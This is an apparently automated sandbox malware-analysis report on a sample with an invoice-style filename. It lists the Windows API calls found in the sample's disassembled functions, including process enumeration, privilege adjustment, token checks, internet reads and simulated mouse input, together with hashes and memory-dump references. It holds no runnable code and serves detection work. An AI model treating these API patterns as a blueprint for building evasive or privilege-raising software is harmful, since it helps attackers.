                                          • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                          • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                          • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                          • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0046C432
                                          • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • CoUninitialize.OLE32 ref: 0046C6B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                                          • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                          • Opcode Fuzzy Hash: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                                          • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                          • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                          • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                          • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: 8474e8f7e6d518a839c74cc5eb54a158aeec258ffafa63196fda6ec9f60604bc
                                          • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                          • Opcode Fuzzy Hash: 8474e8f7e6d518a839c74cc5eb54a158aeec258ffafa63196fda6ec9f60604bc
                                          • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: f379fe3d7a712482d9e6716fbfa6b33f72221a7867f36e4c9f34936809415def
                                          • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                          • Opcode Fuzzy Hash: f379fe3d7a712482d9e6716fbfa6b33f72221a7867f36e4c9f34936809415def
                                          • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: d3217ada22f57d27c47324fc3303e191d98c338249b7559d53ae04592ffd8b14
                                          • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                          • Opcode Fuzzy Hash: d3217ada22f57d27c47324fc3303e191d98c338249b7559d53ae04592ffd8b14
                                          • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                          • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                          • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                          • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                          APIs
                                            • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                            • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                          • GetLastError.KERNEL32 ref: 00458865
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: 81175457bd2116081fd482ae7269f4099234a407432aa681ee186d1b37444670
                                          • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                          • Opcode Fuzzy Hash: 81175457bd2116081fd482ae7269f4099234a407432aa681ee186d1b37444670
                                          • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                          • FreeSid.ADVAPI32(?), ref: 0045879B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                          • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                          • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                          • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                          APIs
                                          • __time64.LIBCMT ref: 0046889B
                                            • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                            • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Time$FileSystem__aulldiv__time64
                                          • String ID: 0eL
                                          • API String ID: 2893107130-3167399643
                                          • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                          • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                          • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                          • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                          • FindClose.KERNEL32(00000000), ref: 0046C72B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                          • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                          • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                          • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
                                          • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                          • Opcode Fuzzy Hash: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
                                          • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                          • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                          • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                          • Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                          • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                          • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                          • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                          • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 7=t>$::1
                                          • API String ID: 0-44347883
                                          • Opcode ID: 6fef08b035a3b0fb34a82f7d4a7e8eda193c1f1bc33809de8141ec4fdf1b8e03
                                          • Instruction ID: e65de11af0d9288a2b86fee44853faa7e893a504278164bbc372da0f62ced09f
                                          • Opcode Fuzzy Hash: 6fef08b035a3b0fb34a82f7d4a7e8eda193c1f1bc33809de8141ec4fdf1b8e03
                                          • Instruction Fuzzy Hash: 3551CE319897C99FDF228AB888953D67FA3AF472183DA00DBC4C04E05BD62595C7CB4B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                          • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                          • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                          • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                          • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                          • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                          • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                          APIs
                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
